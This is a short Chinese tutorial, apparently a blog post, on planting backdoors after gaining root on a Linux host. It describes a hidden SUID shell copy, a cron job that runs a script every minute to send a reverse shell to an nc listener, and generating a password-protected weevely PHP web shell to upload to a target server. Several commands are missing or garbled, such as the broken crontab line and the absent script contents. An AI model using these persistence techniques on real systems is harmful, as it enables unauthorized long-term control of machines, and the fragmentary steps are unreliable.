一些常见后门

linux后门

一、前提：已经是root用户，想留一个后门

suid shell

woot前面的''并不是必须的，只是为了隐藏文件( 在文件名的最前面加上“”，就可以在任意文件目录下进行隐藏)

chmod 4755——作用，使所有使用woot文件的用户都具有文件所有者的权限

此时权限并没有改变，因为bash2 针对 suid有一些护卫的措施 但这也不是不可破的:

二、Unix Bash 远控后门

先创建 /etc/xxxx 脚本文件

设置权限 chmod +sx /etc/door

修改一下 /etc/crontab 让它定时执行

nano /etc/crontab    在 /etc/crontab 文件末加入这一行。代表每 1 分钟执行一次。
/1 root /etc/xxxx

最后重启一下 crond 的服务。（不同发行版重启方式不一样，自行查询）

service cron reload

service cron start

然后在 xxxx 的服务器上使用nc 接收 Shell 即可。

三、常见的Web后门
weevely——针对php

生成密码为123的后门文件
weevely generate 123 /root/weevelyphp

上传到目标服务器，然后远程连接

weevely <目标URL> <密码>就能成功连接上了

以上就是关于一些常见后门全部的内容，包括:一些常见后门、、等相关内容解答，如果想了解更多相关内容，可以关注我们，你们的支持是我们更新的动力！